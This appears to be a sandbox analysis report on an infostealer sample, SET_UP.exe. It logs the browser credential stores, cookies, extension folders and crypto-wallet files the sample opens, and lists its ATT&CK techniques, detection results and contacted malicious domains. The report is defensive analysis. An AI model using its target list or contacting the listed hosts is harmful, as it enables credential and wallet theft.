Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK matrix, listed by tactic column (the leading numbers are the badge counts shown on the page next to matched techniques):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 12 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 21 Virtualization/Sandbox Evasion; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Antivirus results (sample)
Source | Detection | Scanner | Label | Link
SET_UP.exe | 8% | ReversingLabs | |
SET_UP.exe | 4% | Virustotal | | Browse

No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus results (URLs and domains)
Source | Detection | Scanner | Label
https://glowscarrytsv.sbs/apiwg | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/ | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/api7 | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/api9 | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/apia | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/apim | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/apis | 0% | Avira URL Cloud | safe
http://crl.micro8 | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/api | 100% | Avira URL Cloud | malware
https://glowscarrytsv.sbs/apiv | 0% | Avira URL Cloud | safe
https://glowscarrytsv.sbs/B | 0% | Avira URL Cloud | safe
glowscarrytsv.sbs | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
glowscarrytsv.sbs | 188.114.97.3 | true | true | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | | high

Contacted URLs and domains
Name | Malicious | Antivirus Detection | Reputation
https://glowscarrytsv.sbs/api | true | Avira URL Cloud: malware | unknown
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
glowscarrytsv.sbs | true | Avira URL Cloud: safe | unknown
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://glowscarrytsv.sbs/apiwg | SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://glowscarrytsv.sbs/apia | SET_UP.exe, 00000000.00000002.1906733986.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://glowscarrytsv.sbs/apis | SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://glowscarrytsv.sbs/apim | SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.starfieldtech.com/0D | SET_UP.exe | false | | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | SET_UP.exe | false | | high
https://glowscarrytsv.sbs/apiv | SET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.remobjects.com/ps | SET_UP.exe | false | | high
http://x1.c.lencr.org/0 | SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | SET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.innosetup.com/ | SET_UP.exe | false | | high
